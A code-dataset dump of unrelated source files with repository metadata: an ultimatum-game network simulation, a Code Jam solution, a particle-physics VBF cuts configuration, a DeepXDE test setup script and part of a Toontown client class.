initialize every node's strategy
'''
self.strategy_asigned(G,list(G.nodes()),Type = self.player_type)
def initialize_payoff(self,G):
'''
clear all player's payoff
'''
for n in list(G.nodes()):
G.nodes[n]['payoff'] = 0
def fitness_calculate(self,G,n):
'''
f = 1-w+w*Π
'''
return 1 - self.intensity_selection + self.intensity_selection*G.nodes[n]['payoff']
def strategy_asigned(self,G,node_list,Type = 'B'):
'''
A B C ,three types inBdividual
'''
if Type == 'B':
for n in node_list:
#Type-A player
strategy = np.random.rand()
G.nodes[n]['p'] = strategy
G.nodes[n]['q'] = 1-strategy
G.nodes[n]['payoff'] = 0
elif Type == 'A':
for n in node_list:
#Type-A player
strategy = np.random.rand()
G.nodes[n]['p'] = strategy
G.nodes[n]['q'] = strategy
G.nodes[n]['payoff'] = 0
elif Type == 'C':
for n in node_list:
#Type-A player
G.nodes[n]['p'] = np.random.rand()
G.nodes[n]['q'] = np.random.rand()
G.nodes[n]['payoff'] = 0
def synchronous_play(self,G):
'''
using synchronous method to play ultimatum game
and update graph every generation
'''
for n, nbrs in G.adjacency():
for nbr, _ in nbrs.items():
# proposer = n ,responder = nbr
offer = G.nodes[n]['p']
demand = G.nodes[nbr]['q']
if offer > demand:
G.nodes[n]['payoff'] += 1-offer
# G.nodes[nbr]['payoff'] += offer
# proposer = nbr ,responder = n
offer = G.nodes[nbr]['p']
demand = G.nodes[n]['q']
if offer > demand:
# G.node[nbr]['payoff'] += 1-offer
G.nodes[n]['payoff'] += offer
num_nbrs = G.degree(n)
if num_nbrs != 0:
G.nodes[n]['payoff'] /= G.degree(n)
def natural_selection(self,G):
'''
each player i in the network selects at random one neighbor j
and compares its payoff Πi with that of j
'''
cnt = 0
for n in list(G.nodes()):
nbrs = list(G.adj[n])
nbr = np.random.choice(nbrs,size = 1)[0]
n_payoff = G.nodes[n]['payoff']
nbr_payoff = G.nodes[nbr]['payoff']
if nbr_payoff > n_payoff:
probs_adopt = (nbr_payoff - n_payoff)/(2*max(G.degree(n),G.degree(nbr)))
if np.random.rand() < probs_adopt:
# n adopts nbr's strategy
cnt += 1
G.nodes[n]['p'] = G.nodes[nbr]['p']
G.nodes[n]['q'] = G.nodes[nbr]['q']
# print("occur:",cnt)
def social_penalty(self,G):
'''
remove the player with lowest payoff and replace it with random one
'''
lowest_n = 0
for n in G.nodes():
if G.nodes[n]['payoff'] < G.nodes[lowest_n]['payoff']:
lowest_n = n
lowest_cluster = list(G.adj[lowest_n])
lowest_cluster.append(lowest_n)
self.strategy_asigned(G,lowest_cluster,Type = self.player_type)
# for n in lowest_cluster:
# #Type-A player
# strategy = np.random.rand()
# G.nodes[n]['p'] = strategy
# G.nodes[n]['q'] = strategy
# G.nodes[n]['payoff'] = 0
def death_birth_updating(self,G):
'''
death-birth updating process,
choose an individual randomly over the whole population,
reproduce the strategy with proportional to nbr's fitness
'''
individual_list = list(G.nodes())
chosen_individual = np.random.choice(individual_list,size=1)[0]
nbrs = list(G.adj[chosen_individual])
reproduce_probability = list()
for nbr in nbrs:
rp = self.fitness_calculate(G,nbr)
reproduce_probability.append(rp)
reproduce_probability = np.array(reproduce_probability)
reproduce_probability /= sum(reproduce_probability)
reproduce_individual = np.random.choice(nbrs,size=1,p = reproduce_probability)[0]
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def birth_death_updating(self,G):
'''
birth death updating process,
choose an individual with proportional to fitnees
replace one of its nbr randomly
'''
individual_list = list(G.nodes())
fitness_list = list()
for n in individual_list:
fitness = self.fitness_calculate(G,n)
fitness_list.append(fitness)
fitness_list = np.array(fitness_list)
fitness_list /= sum(fitness_list)
reproduce_individual = np.random.choice(individual_list,size = 1,p = fitness_list)[0]
nbrs = list(G.adj[reproduce_individual])
chosen_individual = np.random.choice(nbrs,size = 1)[0]
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def pairwise_comparison(self,G):
'''
pairwise comparison process,
choose an individual and its nbr randomlyj
individual imitate its nbr's strategy with probability of 1/1+e^(-w*(Πi-Πj))
'''
individual_list = list(G.nodes())
chosen_individual = np.random.choice(individual_list,size=1)[0]
nbrs = list(G.adj[chosen_individual])
reproduce_individual = np.random.choice(nbrs,size = 1)[0]
imitate_probability = 1/(1+np.exp(-1*self.intensity_selection*(G.nodes[chosen_individual]['payoff']-G.nodes[reproduce_individual]['payoff'])))
if np.random.rand() < imitate_probability:
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def imitaion_updaing(self,G):
'''
imitaion updating process,
choose an individual randomly,
update its strategy with proportional to its & nbrs fitness
'''
individual_list = list(G.nodes())
chosen_individual = np.random.choice(individual_list,size=1)[0]
fitness_list = list()
nbrs = list(G.adj[chosen_individual])
for n in nbrs:
fitness = self.fitness_calculate(G,n)
fitness_list.append(fitness)
nbrs.append(chosen_individual)
near_domain = nbrs
fitness_ci = self.fitness_calculate(G,chosen_individual)
fitness_list.append(fitness_ci)
fitness_list = np.array(fitness_list)
fitness_list /= sum(fitness_list)
reproduce_individual = np.random.choice(near_domain,size =1,p = fitness_list)[0]
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def mutation(self,G,chosen_individual,reproduce_individual):
if np.random.rand(1) <= self.mutate_rate*10:
G.nodes[chosen_individual]['p'],G.nodes[chosen_individual]['q'] = np.random.rand(2)
print("MC")
# else:
# G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
# G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
def update(self,G):
'''
natural seletion an social penalty
'''
if self.update_rule == "NS":
chosen_individual,reproduce_individual = self.natural_selection(G)
elif self.update_rule == "SP":
chosen_individual,reproduce_individual = self.social_penalty(G)
elif self.update_rule == "DB":
chosen_individual,reproduce_individual = self.death_birth_updating(G)
elif self.update_rule == "BD":
chosen_individual,reproduce_individual = self.birth_death_updating(G)
elif self.update_rule == "PC":
chosen_individual,reproduce_individual = self.pairwise_comparison(G)
elif self.update_rule == "IU":
chosen_individual,reproduce_individual = self.imitaion_updaing(G)
self.mutation(G,chosen_individual,reproduce_individual)
def avg_strategy_calculate(self,G,Epoch):
'''
calculate the mean strategy over arg Epoch
'''
p_vector = self.get_all_values(G,'p')
q_vector = self.get_all_values(G,'q')
p,q = self.avg_strategy #the Epoch-1's average strategy
p = ((p*self.node_num*(Epoch-1)) + np.sum(p_vector))*1.0/(Epoch*self.node_num)
q = ((q*self.node_num*(Epoch-1)) + np.sum(q_vector))*1.0/(Epoch*self.node_num)
# self.avg_pq_list.append((p,q))
return (p,q)
def save(self,G,Epoch):
#Save Graph
result_dir = './result/'
info = "{}_{}_{}_{}_{}_{}".format(self.network_type,self.player_type,self.update_rule,self.intensity_selection,self.mutate_rate,Epoch)
Epoch_dir = os.path.join(result_dir,self.dir_str,info)
if not os.path.exists(Epoch_dir):
os.mkdir(Epoch_dir)
graph_path = os.path.join(Epoch_dir,info+"_Graph.yaml")
nx.write_yaml(G,graph_path)
#Save strategy
p_vector = self.get_all_values(G,'p')
q_vector = self.get_all_values(G,'q')
pq_array = np.vstack((p_vector,q_vector))
pq_path = os.path.join(Epoch_dir,info+"_strategy.csv")
pq = pd.DataFrame(data = pq_array)
pq.to_csv(pq_path)
#Save average offer/respond
avg_pq_path = os.path.join(Epoch_dir,info+"_average_strategy.csv")
avg_pq = pd.DataFrame(data = self.avg_pq_list)
avg_pq.to_csv(avg_pq_path)
def retrain(self,filepath):
'''
continue evolution from specific check point
'''
print(filepath)
filepath = os.path.join('./result/',filepath)
lists = os.listdir(filepath)
lists.sort(key=lambda fn: os.path.getmtime(filepath + "/" + fn))
result_dir = os.path.join(filepath, lists[-1])
result_list = os.listdir(result_dir)
result_list.sort()
parse_str = result_list[0][:-5].split("_")
self.network_type = parse_str[0]
self.player_type = parse_str[1]
self.update_rule = parse_str[2]
self.intensity_selection = float(parse_str[3])
self.mutate_rate = float(parse_str[4])
Epoch = int(parse_str[5])
graph_path = os.path.join(result_dir,result_list[0])
avg_pq_path = os.path.join(result_dir,result_list[1])
avg_pq = pd.read_csv(avg_pq_path)
self.avg_strategy = avg_pq.values[-1][1:]
G = nx.read_yaml(graph_path)
return G,Epoch+1
def get_all_values(self,G,attr_name):
'''
get specific attribute values of all nodes
'''
value_dict = nx.get_node_attributes(G,attr_name)
value_list = list(value_dict.values())
return value_list
def pq_distribution(self,G,attr_name):
x_axis = np.arange(0,1.05,1/20) # 21 descrete points,range 0~1,step size 0.05
y_axis = np.zeros(x_axis.size)
value_list = self.get_all_values(G,attr_name)
for v in value_list:
for i in range(x_axis.size):
if abs(v-x_axis[i]) < 0.05:
y_axis[i] += 1
return (x_axis,y_axis)
def avg_degree_caculate(self,G):
'''
caculate average degree of graph
'''
degree_total = 0
for x in range(len(G.degree())):
degree_total = degree_total + G.degree(x)
return degree_total/self.node_num
if __name__ == '__main__':
node_num = 100
network_type = "RG" # [SF, ER, RG]
update_rule ='PC' # [NS, SP, DB, BD, PC, IU]
player_type = "C" # [A=(p=q,q), B=(p,1-p), C=(p,q)]
avg_degree = 4
intensity_selection = 0.01
mutate_rate = 0.001
avg_strategy_list = []
Epochs = pow(10,7)
check_point = None
# check_point = '2020-03-08-11-52-42'
if check_point != None:
UG = UG_Complex_Network(node_num,network_type,update_rule,player_type,avg_degree,intensity_selection,mutate_rate,check_point)
G,Start = UG.retrain(check_point)
else:
Start = 1
UG = UG_Complex_Network(node_num,network_type,update_rule,player_type,avg_degree,intensity_selection)
#bulids network structure
G = UG.build_network()
#initialize the strategy of player in network
UG.initialize_strategy(G)
#play game
for Epoch in range(Start,Epochs+1):
UG.initialize_payoff(G)
UG.synchronous_play(G)
UG.update(G)
UG.avg_strategy = UG.avg_strategy_calculate(G,Epoch)
if Epoch % 10000 == 0:
print("Epoch[{}]".format(Epoch))
print("Average strategy: (p ,q)={}\n".format(UG.avg_strategy))
UG.avg_pq_list.append(UG.avg_strategy)
UG.save(G,Epoch)
# UG.viz(G)
| [
"[email protected]"
] | |
59b39957186f3c76e740d3bac8084fb63519bf5e | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/3066.py | fce606fdb7b3bf7e4ebcb4d8aa5331d6907dbeba | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,265 | py | fin = open('in', 'r')
fout = open('out', 'w')
numberOfCases = int(fin.readline())
def findChosenRow():
answer = int(fin.readline())
for rowNum in range (1,5):
row = fin.readline()
if rowNum == answer:
cosenRow = row.split()
cosenRow = [int(string) for string in cosenRow]
return cosenRow
def findCommonCard(firstRow, secondRow):
numOfCommons = 0
possibleAnswer = 0
for card1 in firstRow:
for card2 in secondRow:
if card1 == card2:
possibleAnswer = card1
numOfCommons += 1
if numOfCommons == 1:
return possibleAnswer
if numOfCommons > 1:
return 0
if numOfCommons == 0:
return -1
for case in range(1,numberOfCases + 1):
firstRow = findChosenRow()
secondRow = findChosenRow()
answer = findCommonCard(firstRow, secondRow)
if answer > 0:
fout.write('case #' + str(case) + ': ' + str(answer) + '\n')
elif answer == 0:
fout.write('case #' + str(case) + ': Bad magician!\n')
elif answer == -1:
fout.write('case #' + str(case) + ': Volunteer cheated!\n')
def method():
pass
fin.close()
fout.close()
| [
"[email protected]"
] | |
26f14e295a03e3cd20d40a232caddf97471a11f2 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/VBF/Full2016DNN/cuts.py | cfe23e2e39ec86c60d657dd0498314605d02f098 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 13,831 | py | # cuts
#cuts = {}
supercut = 'mll>12 \
&& std_vector_lepton_pt[0]>25 && std_vector_lepton_pt[1]>10 \
&& std_vector_lepton_pt[2]<10 \
&& metPfType1 > 20 \
&& ptll > 30 \
&& (std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
'
cuts['hww2l2v_13TeV_of2j_vbf_incl'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& (mth>=60 && mth<125) \
&& (njet==2) \
&& (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (detajj>3.5 && mjj>=400) \
&& (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
&& '+bVeto+' \
'
cuts['hww2l2v_13TeV_of2j_vbf_incl_NOdetajj'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& (mth>=60 && mth<125) \
&& (njet==2) \
&& (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (mjj>=400) \
&& (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
&& '+bVeto+' \
'
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt09'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.9) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt09'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.9) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt08'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.8) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt08'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.8) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt07'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.7) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt07'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.7) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt06'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.6) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt06'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.6) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt03'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.3) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt03'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.3) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#cuts['hww2l2v_13TeV_of2j_vbf_lowmjj'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400 && mjj<700) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_highmjj'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# & (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=700) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#
# control regions
#
cuts['hww2l2v_13TeV_top_of2j_vbf'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& mll>50 \
&& ( std_vector_jet_pt[0] >= 30 ) \
&& ( std_vector_jet_pt[1] >= 30 ) \
&& (njet==2) \
&& (detajj>3.5 && mjj>400) \
&& ( std_vector_jet_cmvav2[0]>-0.5884 || std_vector_jet_cmvav2[1]>-0.5884 ) \
'
cuts['hww2l2v_13TeV_dytt_of2j_vbf'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& ( mth<60) \
&& mll>40 && mll<80 \
&& ( std_vector_jet_pt[0] >= 30 ) \
&& ( std_vector_jet_pt[1] >= 30 ) \
&& (njet==2) \
&& (detajj>3.5 && mjj>400) \
&& '+bVeto+' \
'
# 11 = e
# 13 = mu
# 15 = tau
| [
"[email protected]"
] | |
4cb9216fe42a1d68811c6513183c40488acaff47 | bb150497a05203a718fb3630941231be9e3b6a32 | /models_restruct/deepxde/tools/start.py | 7e9ecf8ec9ecf1528bb5f166d1ce332103f5b5aa | [] | no_license | PaddlePaddle/PaddleTest | 4fb3dec677f0f13f7f1003fd30df748bf0b5940d | bd3790ce72a2a26611b5eda3901651b5a809348f | refs/heads/develop | 2023-09-06T04:23:39.181903 | 2023-09-04T11:17:50 | 2023-09-04T11:17:50 | 383,138,186 | 42 | 312 | null | 2023-09-13T11:13:35 | 2021-07-05T12:44:59 | Python | UTF-8 | Python | false | false | 6,862 | py | """
start before model running
"""
import os
import sys
import json
import shutil
import urllib
import logging
import wget
logger = logging.getLogger("ce")
class DeepXDE_Start(object):
"""
自定义环境准备
"""
def __init__(self):
"""
init
"""
self.qa_yaml_name = os.environ["qa_yaml_name"]
self.rd_yaml_path = os.environ["rd_yaml_path"]
logger.info("###self.qa_yaml_name: {}".format(self.qa_yaml_name))
self.reponame = os.environ["reponame"]
self.system = os.environ["system"]
self.step = os.environ["step"]
logger.info("###self.step: {}".format(self.step))
self.paddle_whl = os.environ["paddle_whl"]
self.mode = os.environ["mode"] # function or precision
self.REPO_PATH = os.path.join(os.getcwd(), self.reponame)
self.env_dict = {}
self.model = self.qa_yaml_name.split("^")[-1]
logger.info("###self.model_name: {}".format(self.model))
self.env_dict["model"] = self.model
os.environ["model"] = self.model
def prepare_gpu_env(self):
"""
根据操作系统获取用gpu还是cpu
"""
if "cpu" in self.system or "mac" in self.system:
self.env_dict["set_cuda_flag"] = "cpu" # 根据操作系统判断
else:
self.env_dict["set_cuda_flag"] = "gpu" # 根据操作系统判断
return 0
def add_paddle_to_pythonpath(self):
"""
paddlescience 打包路径添加到python的路径中
"""
cwd = os.getcwd()
paddle_path = os.path.join(cwd, "deepxde")
old_pythonpath = os.environ.get("PYTHONPATH", "")
new_pythonpath = f"{paddle_path}:{old_pythonpath}"
os.environ["PYTHONPATH"] = new_pythonpath
os.environ["DDE_BACKEND"] = "paddle"
return 0
def alter(self, file, old_str, new_str, flag=True, except_str="model.train(0"):
"""
replaced the backend
"""
file_data = ""
with open(file, "r", encoding="utf-8") as f:
for line in f:
if flag:
if old_str in line and new_str not in line and except_str not in line:
line = line.replace(old_str, new_str)
else:
if old_str in line:
line = line.replace(old_str, new_str)
file_data += line
with open(file, "w", encoding="utf-8") as f:
f.write(file_data)
return 0
def add_seed(self, file, old_str, new_str):
"""
add the seed
"""
file_data = ""
with open(file, "r", encoding="utf-8") as f:
for line in f:
if old_str in line:
if old_str == "L-BFGS":
if " " not in line:
global flag_LBFGS
flag_LBFGS = True
line += new_str
else:
line += new_str
# line += "paddle.seed(1)\n"
# line += "np.random.seed(1)\n"
file_data += line
with open(file, "w", encoding="utf-8") as f:
f.write(file_data)
return 0
def change_backend(self, file, backend, flag):
"""
change models.py backend
"""
file_data = ""
if flag is True:
index = False
with open(file, "r", encoding="utf-8") as f:
for line in f:
if index is True:
if "# " in line and "Backend jax" not in line:
line = line.replace("# ", "")
else:
index = False
if backend in line:
index = True
file_data += line
with open(file, "w", encoding="utf-8") as f:
f.write(file_data)
else:
index = False
with open(file, "r", encoding="utf-8") as f:
for line in f:
if index is True:
if "Backend paddle" not in line:
line = "# " + line
else:
index = False
if backend in line:
index = True
file_data += line
with open(file, "w", encoding="utf-8") as f:
f.write(file_data)
return 0
def get_example_dir(self):
"""
get_example_dir
"""
example_dir = self.qa_yaml_name.replace("^", "/")
if "lulu" in example_dir:
example_dir = "deepxde" + example_dir[4:] + ".py"
elif "rd" in example_dir:
example_dir = "deepxde" + example_dir[2:] + ".py"
return example_dir
def get_deepxde_data(self):
"""
get_deepxde_data
"""
os.system("cp -r deepxde/examples/dataset/ ./")
return 0
def build_prepare(self):
"""
build prepare
"""
ret = 0
ret = self.prepare_gpu_env()
if ret:
logger.info("build prepare_gpu_env failed")
return ret
os.environ[self.reponame] = json.dumps(self.env_dict)
return ret
def download_datasets(self):
"""
download dataset
"""
url = "https://paddle-qa.bj.bcebos.com/deepxde/datasets.tar.gz"
file_name = "datasets.tar.gz"
urllib.request.urlretrieve(url, file_name)
os.system("tar -zxvf " + file_name + " -C deepxde/")
return 0
def run():
"""
执行入口
"""
model = DeepXDE_Start()
model.build_prepare()
model.add_paddle_to_pythonpath()
model.get_deepxde_data()
filedir = model.get_example_dir()
model.alter(filedir, "tf", "paddle")
model.change_backend(filedir, "Backend paddle", True)
model.change_backend(filedir, "Backend tensorflow.compat.v1", False)
model.alter(filedir, "model.train(", "model.train(display_every=1,", True, "model.train(0")
model.alter(filedir, "model.train(", "losshistory, train_state = model.train(")
model.alter(filedir, "display_every=1000,", " ", False)
model.alter(filedir, "display_every=1000", " ", False)
model.alter(filedir, "display_every=500", " ", False)
model.add_seed(filedir, "import deepxde", "import paddle\n")
# add_seed(filedir, "import paddle", "paddle.seed(1)\n")
model.add_seed(filedir, "import deepxde", "import numpy as np\n")
model.add_seed(filedir, "import deepxde", "dde.config.set_random_seed(1)\n")
if "antiderivative" in model.qa_yaml_name:
model.download_datasets()
return 0
if __name__ == "__main__":
run()
| [
"[email protected]"
] | |
2a3afbad100efcb1edda22e3475a09ff6d227fab | 7949f96ee7feeaa163608dbd256b0b76d1b89258 | /toontown/ai/DistributedPhaseEventMgr.py | 2a79a55ca8df3ac10529506eb7476344ed65df63 | [] | no_license | xxdecryptionxx/ToontownOnline | 414619744b4c40588f9a86c8e01cb951ffe53e2d | e6c20e6ce56f2320217f2ddde8f632a63848bd6b | refs/heads/master | 2021-01-11T03:08:59.934044 | 2018-07-27T01:26:21 | 2018-07-27T01:26:21 | 71,086,644 | 8 | 10 | null | 2018-06-01T00:13:34 | 2016-10-17T00:39:41 | Python | UTF-8 | Python | false | false | 1,096 | py | # File: t (Python 2.4)
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedObject
import datetime
class DistributedPhaseEventMgr(DistributedObject.DistributedObject):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPhaseEventMgr')
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
self.holidayDates = []
def setIsRunning(self, isRunning):
self.isRunning = isRunning
def setNumPhases(self, numPhases):
self.numPhases = numPhases
def setCurPhase(self, curPhase):
self.curPhase = curPhase
def getIsRunning(self):
return self.isRunning
def getNumPhases(self):
return self.numPhases
def getCurPhase(self):
return self.curPhase
def setDates(self, holidayDates):
for holidayDate in holidayDates:
